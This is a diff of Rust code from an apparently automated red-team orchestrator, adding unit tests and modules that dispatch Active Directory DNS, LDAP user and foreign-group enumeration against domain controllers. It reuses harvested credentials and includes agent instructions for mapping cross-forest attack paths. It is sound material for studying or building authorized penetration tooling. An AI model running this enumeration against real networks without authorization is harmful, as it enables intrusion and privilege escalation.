+ let work = DnsEnumWork {
+ dedup_key: "dns_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: None,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert!(work.credential.is_none());
+ }
+
+ #[test]
+ fn work_struct_with_credential() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = DnsEnumWork {
+ dedup_key: "dns_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: Some(cred),
+ };
+ assert!(work.credential.is_some());
+ assert_eq!(work.credential.unwrap().username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_domain_based() {
+ let domain1 = "contoso.local";
+ let domain2 = "fabrikam.local";
+ let key1 = format!("dns_enum:{}", domain1.to_lowercase());
+ let key2 = format!("dns_enum:{}", domain2.to_lowercase());
+ assert_ne!(key1, key2);
+ assert_eq!(key1, "dns_enum:contoso.local");
+ assert_eq!(key2, "dns_enum:fabrikam.local");
+ }
+
+ #[test]
+ fn case_normalization_mixed() {
+ let key = format!("dns_enum:{}", "Contoso.Local".to_lowercase());
+ assert_eq!(key, "dns_enum:contoso.local");
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_dns_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_no_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert!(work[0].credential.is_none());
+ }
+
+ #[test]
+ fn collect_single_domain_with_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert!(work[0].credential.is_some());
+ assert_eq!(work[0].credential.as_ref().unwrap().username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.mark_processed(DEDUP_DNS_ENUM, "dns_enum:contoso.local".into());
+ let work = collect_dns_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_domains() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_skips_empty_password_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ // Empty password cred should not be selected
+ assert!(work[0].credential.is_none());
+ }
+
+ #[test]
+ fn collect_cred_only_matches_same_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ // Cross-domain cred should NOT be selected (dns_enum only matches same domain)
+ assert!(work[0].credential.is_none());
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "dns_enum:contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_dns_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert!(work[0].credential.is_some());
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/domain_user_enum.rs b/ares-cli/src/orchestrator/automation/domain_user_enum.rs
new file mode 100644
index 00000000..2dda9eb9
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/domain_user_enum.rs
@@ -0,0 +1,436 @@
+//! auto_domain_user_enum -- explicit per-domain LDAP user enumeration.
+//!
+//! Unlike initial recon (which does broad DC scanning), this module dispatches
+//! targeted LDAP user enumeration per domain using the best available credential.
+//! This fills the gap where a trusted domain's users are not enumerated because
+//! the initial recon agent only has primary-domain credentials.
+//!
+//! Dispatches `ldap_user_enumeration` to the recon role for each domain that
+//! has a DC but hasn't been fully enumerated yet.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect user enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_domain_user_enum` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_user_enum_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("user_enum:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_DOMAIN_USER_ENUM, &dedup_key) {
+ continue;
+ }
+
+ // Prefer a credential from the target domain.
+ // Fall back to any available credential (cross-domain LDAP may work).
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| {
+ c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ }) {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(UserEnumWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches per-domain LDAP user enumeration.
+/// Interval: 45s.
+pub async fn auto_domain_user_enum(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("domain_user_enumeration") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_user_enum_work(&state)
+ };
+
+ for item in work {
+ let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase();
+ let mut payload = json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "filters": ["(objectCategory=person)(objectClass=user)"],
+ "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"],
+ });
+ if cross_domain {
+ payload["bind_domain"] = json!(item.credential.domain);
+ }
+
+ let priority = dispatcher.effective_priority("domain_user_enumeration");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ cred_user = %item.credential.username,
+ "Domain user enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_DOMAIN_USER_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_DOMAIN_USER_ENUM, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Domain user enumeration deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch user enumeration");
+ }
+ }
+ }
+ }
+}
+
+struct UserEnumWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("user_enum:{}", "contoso.local");
+ assert_eq!(key, "user_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_DOMAIN_USER_ENUM, "domain_user_enum");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ "filters": ["(objectCategory=person)(objectClass=user)"],
+ "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"],
+ });
+ assert_eq!(payload["technique"], "ldap_user_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn ldap_filter_format() {
+ let filters = ["(objectCategory=person)(objectClass=user)"];
+ assert_eq!(filters.len(), 1);
+ assert!(filters[0].contains("objectCategory=person"));
+ assert!(filters[0].contains("objectClass=user"));
+ }
+
+ #[test]
+ fn ldap_attributes_list() {
+ let attrs = [
+ "sAMAccountName",
+ "description",
+ "memberOf",
+ "userAccountControl",
+ "servicePrincipalName",
+ ];
+ assert_eq!(attrs.len(), 5);
+ assert!(attrs.contains(&"sAMAccountName"));
+ assert!(attrs.contains(&"servicePrincipalName"));
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = UserEnumWork {
+ dedup_key: "user_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("user_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "user_enum:contoso.local");
+ }
+
+ #[test]
+ fn credential_quarantine_check_logic() {
+ // Empty password should be skipped by the credential selection logic
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "".into(),
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ assert!(cred.password.is_empty());
+ }
+
+ #[test]
+ fn cross_domain_credential_fallback() {
+ // When no same-domain cred exists, any cred can be used (cross-domain LDAP)
+ let creds = [ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "fabrikam.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }];
+ let target_domain = "contoso.local";
+ let same_domain = creds.iter().find(|c| {
+ c.domain.to_lowercase() == target_domain.to_lowercase() && !c.password.is_empty()
+ });
+ assert!(same_domain.is_none());
+ let fallback = creds.iter().find(|c| !c.password.is_empty());
+ assert!(fallback.is_some());
+ assert_eq!(fallback.unwrap().domain, "fabrikam.local");
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_user_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_user_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_with_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_DOMAIN_USER_ENUM, "user_enum:contoso.local".into());
+ let work = collect_user_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_cross_domain_fallback() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam cred available, should fall back
+ state
+ .credentials
+ .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "crossuser");
+ assert_eq!(work[0].credential.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_skips_empty_password() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_user_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_credential_falls_back() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "gooduser");
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "user_enum:contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_user_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/foreign_group_enum.rs b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs
new file mode 100644
index 00000000..02ab73be
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs
@@ -0,0 +1,471 @@
+//! auto_foreign_group_enum -- enumerate cross-domain/cross-forest group memberships.
+//!
+//! Discovers foreign security principals (FSPs) — users/groups from one domain
+//! that are members of groups in another domain. This reveals cross-forest and
+//! cross-domain attack paths that BloodHound's intra-domain analysis might miss.
+//!
+//! Dispatches LDAP queries per trust relationship to find:
+//! - Foreign users in local groups (e.g., FABRIKAM\jdoe in CONTOSO\TrustedAdmins)
+//! - Foreign groups nested in local groups
+//! - Domain Local groups with foreign members (the primary FSP container)
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect foreign group enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_foreign_group_enum` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_foreign_group_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() || state.domains.len() < 2 {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // For each domain, enumerate foreign security principals
+ for domain in &state.domains {
+ let dedup_key = format!("foreign_group:{domain}");
+ if state.is_processed(DEDUP_FOREIGN_GROUP_ENUM, &dedup_key) {
+ continue;
+ }
+
+ let dc_ip = match state.resolve_dc_ip(domain) {
+ Some(ip) => ip,
+ None => continue,
+ };
+
+ // Find a credential for this domain
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ })
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(ForeignGroupWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Enumerate cross-domain foreign group memberships.
+/// Interval: 45s.
+pub async fn auto_foreign_group_enum(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("foreign_group_enum") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_foreign_group_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "foreign_group_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "filters": [
+ "(objectClass=foreignSecurityPrincipal)",
+ "(&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=4))"
+ ],
+ "attributes": [
+ "sAMAccountName", "member", "memberOf", "objectSid",
+ "groupType", "cn", "distinguishedName"
+ ],
+ "instructions": concat!(
+ "Enumerate Foreign Security Principals and cross-domain group memberships. ",
+ "1) Query CN=ForeignSecurityPrincipals,DC=... to list all foreign SIDs. ",
+ "2) Resolve each SID to its source domain user/group using ldapsearch against ",
+ "the source domain's DC. ",
+ "3) Query Domain Local groups (groupType bit 4) and check for foreign members. ",
+ "4) Report each cross-domain membership: source_domain\\source_user -> target_group ",
+ "(target_domain). These are critical for cross-forest attack paths. ",
+ "5) Register any discovered cross-domain memberships as vulnerabilities with ",
+ "vuln_type='foreign_group_membership', source=foreign_user, target=local_group, ",
+ "domain=target_domain, source_domain=foreign_domain.\n\n",
+ "IMPORTANT: For each user discovered during FSP enumeration, include them in the ",
+ "discovered_users array with EXACTLY this JSON format:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"foreign_group_enumeration\", \"memberOf\": [\"Group1\"]}\n",
+ "Include ALL users found — both foreign principals and local group members."
+ ),
+ });
+
+ let priority = dispatcher.effective_priority("foreign_group_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Foreign group enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_FOREIGN_GROUP_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_FOREIGN_GROUP_ENUM, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Foreign group enum deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch foreign group enum");
+ }
+ }
+ }
+ }
+}
+
+struct ForeignGroupWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("foreign_group:{}", "contoso.local");
+ assert_eq!(key, "foreign_group:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_FOREIGN_GROUP_ENUM, "foreign_group_enum");
+ }
+
+ #[test]
+ fn requires_multiple_domains() {
+ let domains: Vec = vec!["contoso.local".to_string()];
+ assert!(
+ domains.len() < 2,
+ "Single domain should skip foreign group enum"
+ );
+ }
+
+ #[test]
+ fn two_domains_meets_requirement() {
+ let domains: Vec = vec!["contoso.local".to_string(), "fabrikam.local".to_string()];
+ assert!(domains.len() >= 2);
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "foreign_group_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "foreign_group_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = ForeignGroupWork {
+ dedup_key: "foreign_group:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_per_domain() {
+ let key1 = format!("foreign_group:{}", "contoso.local");
+ let key2 = format!("foreign_group:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn foreign_security_principal_resolution() {
+ // The payload includes credential for cross-domain FSP resolution
+ let payload = json!({
+ "technique": "foreign_group_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ // FSP resolution happens via the credential against the target domain
+ assert!(payload.get("credential").is_some());
+ assert_eq!(payload["technique"], "foreign_group_enumeration");
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_foreign_group_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_foreign_group_work(&state);
+ // Requires at least 2 domains
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let work = collect_foreign_group_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_two_domains_with_creds() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_foreign_group_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(
+ DEDUP_FOREIGN_GROUP_ENUM,
+ "foreign_group:contoso.local".into(),
+ );
+ let work = collect_foreign_group_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_skips_domain_without_dc() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ // Only contoso has a DC
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_foreign_group_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_quarantined_credential_falls_back() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_foreign_group_work(&state);
+ // Both domains should still get work (gooduser fallback for contoso)
+ assert_eq!(work.len(), 2);
+ // contoso should fall back to gooduser
